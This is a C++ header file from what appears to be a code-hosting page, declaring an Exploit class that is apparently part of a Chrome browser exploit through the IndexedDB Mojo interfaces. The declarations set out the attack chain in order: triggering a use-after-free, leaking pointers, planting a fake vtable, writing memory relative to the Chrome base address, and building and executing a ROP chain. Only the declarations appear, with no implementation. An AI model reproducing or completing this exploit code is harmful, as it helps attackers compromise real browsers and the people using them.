-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathexploit.h
90 lines (79 loc) · 2.79 KB
/
exploit.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#ifndef CONTENT_EXPLOIT_H_
#define CONTENT_EXPLOIT_H_
#include "third_party/blink/renderer/modules/indexeddb/web_idb_factory_impl.h"
#include "third_party/blink/renderer/modules/indexeddb/web_idb_database_impl.h"
extern "C" void exploit(std::string);
class Exploit {
public:
Exploit();
~Exploit();
void Start();
void RendererHook(std::string);
void OpenDatabase(int version,
blink::mojom::blink::IDBTransactionAssociatedPtr *,
int transaction);
void DatabaseIsClean();
void CallbackUpgradeNeeded(
blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void OpenNewDatabases();
void
CallbackSuccess(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void SetReuseDb(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void SetVTableDb(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void UseAfter();
void TriggerBug();
void LeakData();
void LeakBeforeStep2();
void Step2();
void CleanupDb();
void SaveDb(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void Rop();
void SetRopDb(blink::mojom::blink::IDBDatabaseAssociatedPtrInfo db_info);
void ExecRop();
void leaked_ptr(unsigned long long p) { leaked_ptr_ = p; }
void vtable_ptr(unsigned long long p) { vtable_ptr_ = p; }
void slack_ptr(unsigned long long p) { slack_ptr_ = p; }
private:
enum Cmd {
CMD_SET_ROP_START,
CMD_SET_OFFSET_VTABLE,
CMD_WRITE8,
CMD_WRITE8_CHROME_BASE_PLUS_VALUE,
CMD_WRITE8_SLACK_BASE_PLUS_VALUE,
CMD_WRITE8_SLACK_BASE_ALIGNED,
CMD_START,
INVALID,
};
enum Step {
NOT_STARTED,
CREATING_DB,
COMMITING_DB,
OPEN_DBS,
ABORT_TRANSACTIONS,
USE_AFTER_FREE
};
Step step_;
bool failed_;
blink::mojom::blink::IDBFactoryPtr idb_factory_;
blink::mojom::blink::IDBTransactionAssociatedPtr create_db_req_;
blink::mojom::blink::IDBDatabaseAssociatedPtr freedb_;
blink::mojom::blink::IDBDatabaseAssociatedPtr reusedb_;
blink::mojom::blink::IDBTransactionAssociatedPtr reusedb_req_;
blink::mojom::blink::IDBDatabaseAssociatedPtr vtabledb_;
blink::mojom::blink::IDBTransactionAssociatedPtr vtabledb_req_;
blink::mojom::blink::IDBDatabaseAssociatedPtr ropdb_;
blink::mojom::blink::IDBTransactionAssociatedPtr ropdb_req_;
WTF::String db_name_;
WTF::String db_reuse_name_;
WTF::String db_vtable_name_;
WTF::String db_rop_name_;
unsigned long long offset_vtable_;
unsigned long long rop_start_addr_;
unsigned long long leaked_ptr_;
unsigned long long vtable_ptr_;
unsigned long long slack_ptr_;
unsigned long long chrome_base_;
std::vector<blink::mojom::blink::IDBDatabaseAssociatedPtr> dbs_saved_;
std::vector<std::vector<uint64_t>> renderer_ops_;
};
#endif